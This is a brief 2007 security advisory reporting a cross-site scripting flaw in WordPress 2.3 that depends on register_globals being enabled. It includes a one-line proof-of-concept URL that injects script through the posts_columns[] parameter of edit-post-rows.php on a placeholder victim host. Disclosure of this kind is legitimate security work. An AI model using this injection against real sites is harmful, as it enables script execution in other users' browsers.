[waraxe-2007-SA#059] - XSS in WordPress 2.3
“register_globals” must be “on” for this exploit to be successful. Proof of concept:

http://victim.com/wp-admin/edit-post-rows.php?posts_columns[]=alert(123);

//-----> See ya soon and have a nice day
October 27th, 2007.




